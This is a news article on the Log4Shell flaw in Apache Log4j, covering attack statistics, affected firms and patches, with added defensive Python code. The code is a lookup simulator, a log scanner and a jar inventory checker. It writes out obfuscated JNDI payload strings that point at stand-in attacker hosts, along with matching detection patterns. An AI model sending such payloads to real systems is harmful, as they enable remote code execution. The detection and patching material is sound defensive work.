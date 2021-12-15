AGI – On December 9 the existence of a vulnerability in Log4j was revealed, and it was given the name Log4Shell. For a couple of days the news remained the preserve of cyber security experts and industry sites. Even then, many were alarmed. Yet it took a long time for the news to reach the main international agencies and the big media, partly because understanding what it is is not easy, and explaining it even less so.

In the following days it became clear that Log4j is a library used by a large share of the programmers who work in Java, one of the most widely used languages in the world, the one in which billions of programs and applications in circulation are written. A small piece of code hidden in the folds of those programs, but one on which the programs themselves depend. And at risk, experts explain, are not just companies but the servers and programs of financial groups, states and national institutions. Everyone agrees that this is one of the most serious vulnerabilities discovered in recent years.

What is Log4j

Log4j is an open-source logging library distributed free of charge by the Apache Software Foundation. It has been downloaded many millions of times and has probably been used billions of times. The library lets software developers record user activity and application behaviour, so that these records can be reviewed and checked later if necessary, or handed to other parts of the program itself. Inside a log message Log4j recognises small placeholders of the form ${...}, called lookups, which it replaces with a value at the moment the message is written, somewhat like the tags used to mark blog or Twitter topics.

The vulnerability discovered in December

On December 9 it was publicly disclosed that one of these lookups could be abused (the flaw is tracked as CVE-2021-44228). The ${jndi:...} lookup asks a directory server named inside the placeholder, over protocols such as LDAP or RMI, for a Java object; vulnerable versions of Log4j would follow that reference and load code from the server. Since the placeholder is evaluated wherever it ends up in a log message, including in a username, a web browser's User-Agent header or a chat message, attackers can remotely execute code on the target computer. They can then steal data, install malware, or take over the entire system. What generally happens when a vulnerability like this is discovered?

Some experts consulted by AGI explained that the developer community generally opts to make the vulnerability public, or semi-public. An ethical question, but also a practical one: the sooner people know, the sooner everyone can find a solution. On the other hand, the information also reaches malicious actors: thousands of hackers who have since started looking for this vulnerability in the software of institutions, organizations and companies.
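To make the mechanism described under "The vulnerability discovered in December" concrete, here is a small Python model of how the vulnerable Log4j releases (2.0-beta9 through 2.14.1) treat a log message. This is an added illustration, not Log4j's own code: the real library is Java, and instead of contacting the LDAP or RMI server the `jndi` handler below only records the URL it would have connected to. The `lower`, `upper`, `env` and `${var:-default}` forms are real Log4j lookup syntax; the hostname `attacker.example` and the payload are constructed for the example, and `resolve_lookups_in_messages=False` models the patched behaviour (2.15.0 turned message lookups off by default, 2.16.0 removed them).

```python
import re
from dataclasses import dataclass, field

# Innermost ${...} that contains no further "${" or "}" is resolved first, then the
# outer one, which is why "${${lower:J}ndi:...}" ends up as "${jndi:...}".
LOOKUP = re.compile(r"\$\{([^${}]*)\}")


@dataclass
class SimulatedLog4j:
    """Toy model of message lookups in Log4j 2.0-beta9 .. 2.14.1 (added example, not Log4j code)."""
    env: dict = field(default_factory=dict)            # stand-in for the process environment
    jndi_requests: list = field(default_factory=list)  # URLs the real library would have fetched
    resolve_lookups_in_messages: bool = True           # False models the 2.15.0+/2.16.0 behaviour

    def _lookup(self, var: str):
        prefix, _, key = var.partition(":")
        if prefix == "lower":
            return key.lower()
        if prefix == "upper":
            return key.upper()
        if prefix == "env":
            return self.env.get(key)
        if prefix == "jndi":
            # The real JndiLookup would call InitialContext.lookup(key): an LDAP/RMI round trip
            # to whatever host the string names, which may answer with code to load.
            self.jndi_requests.append(key)
            return f"<jndi:{key}>"
        return None  # unknown prefix: Log4j leaves the text as it was

    def substitute(self, text: str) -> str:
        """Expand ${...} lookups recursively, honouring the ${var:-default} syntax."""
        while (m := LOOKUP.search(text)):
            body = m.group(1)
            var, has_default, default = body.partition(":-")
            value = self._lookup(var)
            if value is None:
                # Unresolved: use the default if given, else keep the literal text
                # (temporarily marked so the loop does not see it again).
                value = default if has_default else "\x00{" + body + "}"
            text = text[:m.start()] + value + text[m.end():]
        return text.replace("\x00{", "${")

    def log(self, message: str) -> str:
        # In the vulnerable versions the message itself, not just the layout pattern,
        # is pushed through the substitutor; 2.16.0 removed that step entirely.
        if self.resolve_lookups_in_messages:
            message = self.substitute(message)
        return f"[INFO] {message}"


def demo():
    """Log a constructed attacker User-Agent with a vulnerable and a fixed logger."""
    user_agent = "${${lower:J}ndi:ldap://attacker.example:1389/a}"  # constructed payload
    vulnerable = SimulatedLog4j()
    fixed = SimulatedLog4j(resolve_lookups_in_messages=False)
    vulnerable.log(f"request from user-agent {user_agent}")
    fixed.log(f"request from user-agent {user_agent}")
    return vulnerable.jndi_requests, fixed.jndi_requests


if __name__ == "__main__":
    print(demo())  # (['ldap://attacker.example:1389/a'], [])
```

The point of the nested `${lower:J}` is that the string never contains the literal `jndi` until Log4j itself assembles it, which is why simple keyword filters on the way in were bypassed within hours of disclosure; the fixed logger produces the same log line but never touches the network.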

840,000 attacks in three days

A snapshot of what happened in the hours that followed was provided today by Check Point, an Israeli cyber security company: on 10 December a few thousand attack attempts were recorded; on 11 December they became 40,000; on 12 December 200,000; yesterday, 13 December, there were already more than 840,000.

A frightening progression. So much so that Lotem Finkelstein, the company's director of Threat Intelligence and Research, said bluntly: "We can only confirm the seriousness of this threat. Apparently, it is aimed at cryptominers, but we believe that this constitutes the warning of a hacker attack against a number of high-value targets such as banks, state security and critical infrastructures."

Furthermore, according to the same figures, 40% of companies globally have reportedly been the target of attack attempts: 42% in Europe and 43% in Italy alone. A situation serious enough to alarm the National Cybersecurity Agency, which in recent days spoke of "a vast and diversified attack surface on the entire network", defining the situation as "particularly serious".
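For anyone who wants to look for these attempts in their own web server logs, here is an added Python example, not from Check Point or from the original article, that scans Apache-style access log lines for Log4Shell payloads. The four log lines are constructed samples using documentation-range IP addresses. Real attackers also place the string in other headers (X-Forwarded-For, Authorization), in usernames and in form fields, so the same check should be run over whatever ends up in the application's own logs, not only the access log.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format with documentation-range addresses
# (not real traffic). Lines 1, 2 and 4 carry a payload; line 3 is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"
203.0.113.9 - - [10/Dec/2021:14:03:40 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2021:14:04:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "https://example.org/" "Mozilla/5.0"
203.0.113.12 - - [10/Dec/2021:14:05:59 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://198.51.100.40:1099/x}"
"""

JNDI = re.compile(r"\$\{jndi:")
# Scheme and host[:port] of the server the payload points at (what to block / pivot on).
CALLBACK = re.compile(r"\b(ldaps?|rmi|dns|iiop|corba|nds|https?)://([\w.\-]+)(?::(\d+))?")


def normalize(s: str) -> str:
    """Undo the cheap obfuscations seen in the wild: (repeated) URL-encoding and the
    ${::-x}, ${lower:x}, ${upper:x} wrappers. Lower-cased for matching."""
    for _ in range(3):                       # bounded: attackers double-encode, we stop at 3
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    prev = None
    while prev != s:                         # peel wrappers from the inside out
        prev = s
        s = re.sub(r"\$\{::-([^${}]*)\}", r"\1", s)
        s = re.sub(r"\$\{(?:lower|upper):([^${}]*)\}", r"\1", s)
    return s.lower()


def scan(log_text: str) -> list:
    """Return one finding per line that carries a (possibly obfuscated) JNDI lookup."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        norm = normalize(line)
        hit = JNDI.search(norm)
        if not hit:
            continue
        cb = CALLBACK.search(norm, hit.end())  # look only after "${jndi:", not at the Referer
        findings.append({
            "line": lineno,
            "src": line.split(" ", 1)[0],
            "callback": cb.group(0) if cb else None,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Pattern matching like this is a floor, not a ceiling: a payload that assembles the letters from `${env:...}`, `${sys:...}` or `${date:...}` lookups will slip past it. Pair it with egress monitoring for LDAP (389, 1389), RMI (1099) and unexpected outbound HTTP from Java processes, since the callback is the part of the attack the attacker cannot hide from the network.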

The internet is in danger

The situation is therefore serious, and the Internet remains in danger. And, the experts explain, it could remain in the balance for years, because it is so complicated to identify and fix every place where Log4j has been used.

So far the intrusion attempts have mainly had the purpose of cryptomining, the process of mining cryptocurrencies such as bitcoin. But security experts are particularly concerned that the vulnerability may above all give hackers a sufficient foothold within a system to install ransomware, a type of malware that locks up data and systems until the victims pay the attackers.

For larger companies, these ransoms can cost millions of dollars. Attacks can also disrupt services, as happened to Colonial Pipeline's systems last May, causing a six-day shutdown of the largest fuel pipeline on the east coast of the United States. Or cause damage like that which hit the health system of the Lazio Region last August, or more recently the attack on SIAE. There are thousands of examples.

Millions of servers at risk

"Millions of servers are likely at risk," said Lou Steinberg, founder of CTM Insights, a technology incubator. An Apache spokesperson, for their part, acknowledged that the way Log4j is embedded in different pieces of software makes it impossible to determine the full extent of its use. Many tech companies have used it, and the more the hours pass, the more companies discover that they have used it in some way. Among them are Apple, Amazon.com, Cloudflare, IBM, Microsoft (Minecraft), Palo Alto Networks, Twitter and Tesla. But the list could be much longer.

The solutions attempted

Some are already making counter-moves. Apache has released several updates in the past few days and recommends updating to the latest version of Log4j. Oracle released its patches on Friday.

Microsoft has recommended a number of steps to mitigate the risk, including contacting software vendors to make sure their products ship the latest version of the Log4j library, which contains the fix. Updating the Java runtime alone is not enough: recent Java versions refuse to load classes from a remote LDAP codebase by default, which blocks the simplest exploit, but the lookup still reaches the attacker's server and other ways of turning it into code execution remain. It is a race against an unknown enemy that keeps attacking infrastructure through a single piece: a small, often invisible card placed at the base of a pyramid of cards that risks collapsing.
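Updating is only possible once you know where the library is, and the Apache spokesperson quoted above explains why that is hard: Log4j is usually buried inside other software. The check below is an added Python example, not Apache's or Microsoft's own tooling. It walks a directory tree, opens every .jar, .war and .ear (including archives bundled inside other archives, as in fat jars), reads the log4j-core version from the Maven pom.properties that the build embeds, and reports whether the JndiLookup class is still present, since deleting that class from the jar was Apache's recommended stop-gap where upgrading was not possible. The two archives that `build_demo_tree` creates are constructed test fixtures, not real software.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(pom_text: str, archive_name: str):
    """Version from pom.properties, falling back to a log4j-core-X.Y.Z.jar file name."""
    m = (re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_text, re.M)
         or re.search(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$", archive_name))
    return tuple(int(x) for x in m.groups()) if m else None


def is_fixed(v) -> bool:
    """True for releases in which log messages can no longer trigger JNDI lookups
    (CVE-2021-44228 and its follow-up CVE-2021-45046): 2.16.0 and later, plus the
    Java 7 and Java 6 backports 2.12.2+ and 2.3.1+. 2.15.0 is deliberately not counted."""
    return v >= (2, 16, 0) or (2, 12, 2) <= v < (2, 13, 0) or (2, 3, 1) <= v < (2, 4, 0)


def inspect_archive(name: str, data: bytes, findings: list, depth: int = 0):
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM in names or JNDI_CLASS in names:
            pom_text = zf.read(POM).decode("utf-8", "replace") if POM in names else ""
            version = parse_version(pom_text, name)
            has_jndi = JNDI_CLASS in names
            if not has_jndi:
                status = "ok (JndiLookup removed)"
            elif version and is_fixed(version):
                status = "ok"
            else:
                status = "VULNERABLE"  # includes "class present, version unknown"
            findings.append({"archive": name, "version": version,
                             "jndi_lookup_present": has_jndi, "status": status})
        if depth < 2:  # fat jars, WAR/EAR: look inside bundled archives too
            for inner in names:
                if inner.endswith(ARCHIVE_SUFFIXES):
                    inspect_archive(f"{name}!/{inner}", zf.read(inner), findings, depth + 1)


def scan_tree(root) -> list:
    """Inspect every Java archive under root and return one finding per log4j-core found."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix in ARCHIVE_SUFFIXES:
            inspect_archive(str(p), p.read_bytes(), findings)
    return findings


def build_demo_tree(root=None) -> str:
    """Write two constructed sample archives (not real software): app.jar bundling a
    vulnerable log4j-core 2.14.1, and fat.jar nesting a fixed 2.17.1 under lib/."""
    root = root or tempfile.mkdtemp()
    with zipfile.ZipFile(Path(root, "app.jar"), "w") as z:
        z.writestr(POM, "artifactId=log4j-core\nversion=2.14.1\n")
        z.writestr(JNDI_CLASS, b"")
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM, "artifactId=log4j-core\nversion=2.17.1\n")
        z.writestr(JNDI_CLASS, b"")
    with zipfile.ZipFile(Path(root, "fat.jar"), "w") as z:
        z.writestr("lib/log4j-core-2.17.1.jar", inner.getvalue())
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_demo_tree()):
        print(finding)
```

Run it against the application and library directories of each server (for Linux, something like /opt and /usr/share, plus wherever deployed WARs live). Two caveats a practitioner should keep in mind: a build that "shades" Log4j into its own package renames the class path and will not match JNDI_CLASS, and an archive that passes this check can still be loaded alongside another, unpatched copy on the same classpath, so the scan is an inventory aid, not proof of safety.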